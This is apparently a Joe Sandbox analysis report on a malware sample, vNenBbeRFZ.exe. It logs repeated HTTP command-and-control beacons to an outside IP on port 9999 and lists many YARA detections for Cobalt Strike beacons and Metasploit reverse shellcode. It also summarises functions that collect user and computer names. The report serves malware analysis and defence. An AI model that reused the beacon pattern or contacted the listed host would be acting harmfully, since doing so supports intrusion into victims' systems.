Oct 8, 2024 04:21:28.813273907 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:21:29.718110085 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:21:29 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
140	192.168.2.4	54362	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:21:29.832236052 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:21:30.764477968 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:21:30 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
141	192.168.2.4	54363	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:21:30.880175114 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:21:31.774110079 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:21:31 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
142	192.168.2.4	54364	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:21:31.897211075 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:21:32.819158077 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:21:32 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
143	192.168.2.4	54365	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:21:32.947186947 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:21:33.867526054 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:21:33 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
144	192.168.2.4	54366	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:21:33.992014885 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:21:34.916101933 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:21:34 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
145	192.168.2.4	54367	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:21:35.039766073 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:21:35.935211897 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:21:35 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
146	192.168.2.4	54368	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:21:36.054264069 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:21:36.953233004 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:21:36 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
147	192.168.2.4	54369	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:21:37.067219973 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:21:38.005522013 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:21:37 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
148	192.168.2.4	54370	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:21:38.115185976 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:21:39.027264118 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:21:38 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
149	192.168.2.4	54371	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:21:39.146049023 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:21:40.068170071 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:21:39 GMT Content-Type: application/octet-stream Content-Length: 0

Target ID:	0
Start time:	22:18:59
Start date:	07/10/2024
Path:	C:\Users\user\Desktop\vNenBbeRFZ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\vNenBbeRFZ.exe"
Imagebase:	0x400000
File size:	14'848 bytes
MD5 hash:	D5B1B322CA3997B573D687FDD9B4DF96
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.4136642076.0000000000110000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Shellcode_Generic_8c487e57, Description: unknown, Source: 00000000.00000002.4136642076.0000000000110000.00000020.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Metasploit_38b8ceec, Description: Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon)., Source: 00000000.00000002.4136642076.0000000000110000.00000020.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Metasploit_24338919, Description: Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon)., Source: 00000000.00000002.4136642076.0000000000110000.00000020.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Beacon_K5om, Description: Detects Meterpreter Beacon - file K5om.dll, Source: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net Rule: Leviathan_CobaltStrike_Sample_1, Description: Detects Cobalt Strike sample from Leviathan report, Source: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: crime_win32_csbeacon_1, Description: Detects Cobalt Strike loader, Source: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Author: @VK_Intel Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_CobaltStrike, Description: CobaltStrike payload, Source: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	2.7%
Dynamic/Decrypted Code Coverage:	90.5%
Signature Coverage:	10.9%
Total number of Nodes:	650
Total number of Limit Nodes:	19

Executed Functions

Function 0040116C Relevance: 19.7, APIs: 13, Instructions: 199
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 004011B7
SetUnhandledExceptionFilter.KERNEL32 ref: 00401238
__p__acmdln.MSVCRT ref: 00401261
malloc.MSVCRT ref: 004012EB
strlen.MSVCRT ref: 0040131B
malloc.MSVCRT ref: 00401326
memcpy.MSVCRT ref: 0040133C
GetStartupInfoA.KERNEL32 ref: 00401433

Memory Dump Source

Source File: 00000000.00000002.4136714904.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4136703049.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136727118.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136738409.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136748950.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vNenBbeRFZ.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdlnmemcpystrlen
String ID:
API String ID: 1672962128-0
Opcode ID: 1328b29ecc5914fa16419d8df3e26723fd871774e9cbd21edfb8a904c7ba64a4
Instruction ID: e7b54b49d806d02bb8736458d744f9cdbb76a445c964799f24dfdc55960c7114
Opcode Fuzzy Hash: 1328b29ecc5914fa16419d8df3e26723fd871774e9cbd21edfb8a904c7ba64a4
Instruction Fuzzy Hash: ED816BB1A046108FDB10EF69EA8476E77E0FB44304F10453EE985BB3A1D779A845CF9A

Function 03D76C99 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 03D76F4C: _malloc.LIBCMT ref: 03D76F52
Part of subcall function 03D76F4C: _malloc.LIBCMT ref: 03D76F62

GetUserNameA.ADVAPI32(?,?), ref: 03D76CFE
GetComputerNameA.KERNEL32(?,?), ref: 03D76D0E

Part of subcall function 03D72BF0: WSASocketA.WS2_32(00000002,00000002,00000000,00000000,00000000,00000000), ref: 03D72C10

GetModuleFileNameA.KERNEL32(00000000,?,00000100,?,?,?,?,?,?,?,?,?,00000000), ref: 03D76D22
_strrchr.LIBCMT ref: 03D76D31
GetVersionExA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 03D76D4C
__snprintf.LIBCMT ref: 03D76DB8

Strings

%s%s%s, xrefs: 03D76DAF

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: Name$_malloc$ComputerFileModuleSocketUserVersion__snprintf_strrchr
String ID: %s%s%s
API String ID: 56250281-1891519693
Opcode ID: fab30698be20daf3ad83d3f52c32ec2661456b189757a3799afc4ba9c1b8f029
Instruction ID: ec496a75b6c4021ea22f89d0029894eb5d0b6d7bb56826349878f05dd0c29f3d
Opcode Fuzzy Hash: fab30698be20daf3ad83d3f52c32ec2661456b189757a3799afc4ba9c1b8f029
Instruction Fuzzy Hash: 7A416D79D00349AEDF11EFA1DC499BEBFB9EF05710F10485AE900AA250FB759A14EB60

Function 004013C1 Relevance: 12.1, APIs: 8, Instructions: 108
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00401238
__p__acmdln.MSVCRT ref: 00401261
malloc.MSVCRT ref: 004012EB
strlen.MSVCRT ref: 0040131B
malloc.MSVCRT ref: 00401326
memcpy.MSVCRT ref: 0040133C
_amsg_exit.MSVCRT ref: 004013E2
_initterm.MSVCRT ref: 00401404

Memory Dump Source

Source File: 00000000.00000002.4136714904.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4136703049.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136727118.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136738409.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136748950.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vNenBbeRFZ.jbxd

Similarity

API ID: malloc$ExceptionFilterUnhandled__p__acmdln_amsg_exit_inittermmemcpystrlen
String ID:
API String ID: 2053141405-0
Opcode ID: 990f2dde752c76189fde4fdf605106f0a3558b2b34ef47bf52059af78fd45bcf
Instruction ID: 903763490605ca783e7d49aca96d3516e9d6dca8f386df50a78e32694d05dd0d
Opcode Fuzzy Hash: 990f2dde752c76189fde4fdf605106f0a3558b2b34ef47bf52059af78fd45bcf
Instruction Fuzzy Hash: 8B41FAB0A046018FDB10EF65EA8575EB7E0FB44304F10853EE984BB3A1D7789945CF9A

Function 004011A3 Relevance: 10.6, APIs: 7, Instructions: 114
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 004011B7
SetUnhandledExceptionFilter.KERNEL32 ref: 00401238
__p__acmdln.MSVCRT ref: 00401261
malloc.MSVCRT ref: 004012EB
strlen.MSVCRT ref: 0040131B
malloc.MSVCRT ref: 00401326
memcpy.MSVCRT ref: 0040133C
_amsg_exit.MSVCRT ref: 004013E2
_initterm.MSVCRT ref: 00401404

Memory Dump Source

Source File: 00000000.00000002.4136714904.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4136703049.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136727118.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136738409.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136748950.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vNenBbeRFZ.jbxd

Similarity

API ID: malloc$ExceptionFilterSleepUnhandled__p__acmdln_amsg_exit_inittermmemcpystrlen
String ID:
API String ID: 2230096795-0
Opcode ID: de23a551c5d36e196ccfa19b7f19428f0ac5e80a92983559ab56ccf87e156934
Instruction ID: 7ced2320459af43fd7b7ad1c0c19893e7b5da4fd76ef09cfecb5bf2edcca9708
Opcode Fuzzy Hash: de23a551c5d36e196ccfa19b7f19428f0ac5e80a92983559ab56ccf87e156934
Instruction Fuzzy Hash: 624109B0A046018FDB10EF69EA8475EB7E0FB44344F11853EE984BB3A1D7789845CF9A

Function 00401160 Relevance: 9.1, APIs: 6, Instructions: 130
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 004011B7
SetUnhandledExceptionFilter.KERNEL32 ref: 00401238
__p__acmdln.MSVCRT ref: 00401261
malloc.MSVCRT ref: 004012EB
strlen.MSVCRT ref: 0040131B
malloc.MSVCRT ref: 00401326
memcpy.MSVCRT ref: 0040133C
GetStartupInfoA.KERNEL32 ref: 00401433

Memory Dump Source

Source File: 00000000.00000002.4136714904.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4136703049.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136727118.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136738409.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136748950.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vNenBbeRFZ.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdlnmemcpystrlen
String ID:
API String ID: 1672962128-0
Opcode ID: 4d8d9d2bcf31573886c2e16688486179ddb1f72a4f57bbbe43842c33a702a2b7
Instruction ID: e6c192ab6511dce5159ab8939de04b6b9fae8b992703ead299acfb3f5af4cda1
Opcode Fuzzy Hash: 4d8d9d2bcf31573886c2e16688486179ddb1f72a4f57bbbe43842c33a702a2b7
Instruction Fuzzy Hash: 9D5127B1A046008FDB10DF69EA8475EBBE4FB48304F15853EE944BB3A1D7789845CF9A

Function 03D77AF5 Relevance: 9.1, APIs: 6, Instructions: 113
networkCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 03D77B19

Part of subcall function 03D858CD: __FF_MSGBANNER.LIBCMT ref: 03D858F0
Part of subcall function 03D858CD: __NMSG_WRITE.LIBCMT ref: 03D858F7
Part of subcall function 03D858CD: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,03D8D8A9,00000000,00000001,00000000,?,03D8766D,00000018,03DA0748,0000000C,03D876FE), ref: 03D85944

htonl.WS2_32(?), ref: 03D77B45
recvfrom.WS2_32(00000000,?,000FFFFC,00000000,000000FF,?), ref: 03D77B74
WSAGetLastError.WS2_32 ref: 03D77B7F

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: AllocateErrorHeapLast_mallochtonlrecvfrom
String ID:
API String ID: 987280018-0
Opcode ID: 030ad2d4387c7fbb366ccd2d370bf3b174bc3049815b3c9bd5a69fcfee3c14e0
Instruction ID: 5e42b5df66ccb8ca5f28d9cfee335008a662fe30346d7ab7d434f0c3483d718d
Opcode Fuzzy Hash: 030ad2d4387c7fbb366ccd2d370bf3b174bc3049815b3c9bd5a69fcfee3c14e0
Instruction Fuzzy Hash: 08410773D00704EFEB21DF64DD04B7EB7B8EB48724F184A69E551A6290E3705A41DB51

Function 03D7C187 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44
encryptionCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,F0000020,00000000,00000000,?,?,03D7C1FD,?,03D76E20,?,03D76E20,?), ref: 03D7C1AA
CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,F0000028,?,?,03D7C1FD,?,03D76E20,?,03D76E20,?), ref: 03D7C1BD
CryptGenRandom.ADVAPI32(00000000,03D76E20,?,?,?,03D7C1FD,?,03D76E20,?,03D76E20,?), ref: 03D7C1D1
CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,03D7C1FD,?,03D76E20,?,03D76E20,?), ref: 03D7C1E1

Strings

Microsoft Base Cryptographic Provider v1.0, xrefs: 03D7C19E, 03D7C1A3, 03D7C1B7

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

